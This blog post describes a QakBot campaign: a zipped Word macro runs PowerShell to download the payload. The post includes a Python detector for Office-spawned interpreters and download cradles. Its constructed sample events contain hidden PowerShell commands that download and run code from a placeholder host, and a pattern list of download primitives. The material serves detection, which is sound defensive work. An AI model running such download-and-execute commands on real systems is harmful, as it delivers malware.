New QakBot Techniques

The QBot banking Trojan, also known as Qakbot or Pinkslipbot, has been known to cybersecurity researchers since 2008, and it keeps tricking businesses with new campaigns that demonstrate its elaborate stealth capabilities.

Another phishing campaign delivering the malicious document has attracted researchers’ attention. The latest QakBot attack is notable for delivering the document inside a ZIP file rather than as a plain Microsoft Word attachment. The zipped document contains a macro that executes a PowerShell script, which in turn downloads the QakBot payload from a predefined URL.

We already warned our readers about the cunning QakBot Trojan in our Rule of the Week post: https://socprime.com/blog/rule-of-the-week-qbot-trojan-detection/

Today, we want to inform you that the attackers have added two techniques to their arsenal: a bypass of CDR (content disarm and reconstruction) technology, and a bypass of child-parent pattern detection.
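The post describes the infection chain (zipped document, macro, PowerShell, payload download) and says the new variant evades child-parent pattern detection, without detailing how. The following Python example is added here for illustration and is not the Sigma rule or any SOC Prime code. It runs two independent checks over constructed process-creation events (in the spirit of Sysmon event ID 1): it walks the whole ancestor chain rather than only the immediate parent when looking for an Office host, and it flags PowerShell command lines containing common download-cradle primitives regardless of parent, so that either signal alone is enough to raise an alert. The intermediate cmd.exe hop in the sample data is a hypothetical indirection chosen to exercise the ancestor walk, not a claim about how QakBot performs the bypass.

```python
"""Toy detector for Office-spawned interpreters and PowerShell download cradles.
Added example; the events below are constructed, not real telemetry."""
import re
from dataclasses import dataclass
from typing import Dict, Iterator, List

# Process images that open user-supplied documents and host macros.
OFFICE_HOSTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
# Script and command interpreters a macro typically hands off to.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# PowerShell primitives commonly used to fetch remote content (a "download cradle").
DOWNLOAD_CRADLE = re.compile(
    r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|net\.webclient|start-bitstransfer",
    re.IGNORECASE,
)


@dataclass(frozen=True)
class ProcessEvent:
    """Minimal process-creation record: pid, parent pid, image path, command line."""
    pid: int
    ppid: int
    image: str
    cmdline: str


def image_name(path: str) -> str:
    """Lower-cased file name of an image path, tolerating both slash styles."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def ancestors(event: ProcessEvent, index: Dict[int, ProcessEvent], max_depth: int = 8) -> Iterator[ProcessEvent]:
    """Yield the parent, grandparent, ... of `event`, guarding against cycles and runaway depth."""
    seen = set()
    cur = index.get(event.ppid)
    while cur is not None and cur.pid not in seen and len(seen) < max_depth:
        yield cur
        seen.add(cur.pid)
        cur = index.get(cur.ppid)


def classify(event: ProcessEvent, index: Dict[int, ProcessEvent]) -> List[str]:
    """Return the list of reasons this event is suspicious (empty if none)."""
    reasons = []
    name = image_name(event.image)
    lineage = [image_name(a.image) for a in ancestors(event, index)]
    # Check 1: an interpreter anywhere below an Office host, not only as a direct child.
    if name in INTERPRETERS and any(a in OFFICE_HOSTS for a in lineage):
        reasons.append("interpreter with Office host in ancestry")
    # Check 2: a PowerShell download cradle, independent of who launched it.
    if name in POWERSHELL and DOWNLOAD_CRADLE.search(event.cmdline):
        reasons.append("PowerShell download cradle")
    return reasons


def detect(events: List[ProcessEvent]) -> Dict[int, List[str]]:
    """Map pid -> reasons for every flagged event in `events`."""
    index = {e.pid: e for e in events}
    return {e.pid: r for e in events if (r := classify(e, index))}


# Constructed sample events (hypothetical paths and URLs).
SAMPLE_EVENTS = [
    ProcessEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcessEvent(200, 100, r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                 r'"WINWORD.EXE" /n "C:\Users\u\AppData\Local\Temp\invoice.doc"'),
    # Direct macro -> PowerShell -> download chain, as described in the post.
    ProcessEvent(300, 200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell -w hidden -c (New-Object Net.WebClient).DownloadFile("
                 "'http://example.invalid/p.png','C:\\Users\\u\\AppData\\Local\\Temp\\p.exe')"),
    # Hypothetical indirection through cmd.exe: a parent-only rule would miss pid 500.
    ProcessEvent(400, 200, r"C:\Windows\System32\cmd.exe", "cmd /c start /min powershell"),
    ProcessEvent(500, 400, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell -nop -c IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s.ps1')"),
    # Benign administrative use launched from Explorer.
    ProcessEvent(600, 100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell Get-Process"),
]

if __name__ == "__main__":
    for pid, reasons in detect(SAMPLE_EVENTS).items():
        print(pid, "->", "; ".join(reasons))
```

Against the sample data, pids 300 and 500 trigger both checks, pid 400 (cmd.exe under WINWORD.EXE) triggers only the ancestry check, and the benign Get-Process launch is not flagged. In a SIEM the same two conditions would be written as separate detections so that an attacker defeating one does not silence the other.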

Osman Demir, an active participant in the Threat Bounty Developer Program, published a Sigma rule to detect the modernized QakBot Trojan:

https://tdm.socprime.com/?dateFrom=0&dateTo=0&searchProject=content&searchType%5B%5D=name&searchSubType=&searchQueryFeatures=false&searchValue=qakbat+maldoc+campaign+two+new+techniques

The rule has translations for the following platforms:

SIEM: Azure Sentinel, ArcSight, QRadar, Splunk, Graylog, Sumo Logic, ELK Stack, RSA NetWitness, LogPoint, Humio

EDR: Carbon Black, Elastic Endpoint

MITRE ATT&CK: 

Tactics: Execution

Techniques: Command-Line Interface (T1059), PowerShell (T1059), User Execution (T1204)

Ready to try out SOC Prime TDM? Sign up for free. Or join the Threat Bounty Program to craft your own content and share it with the TDM community.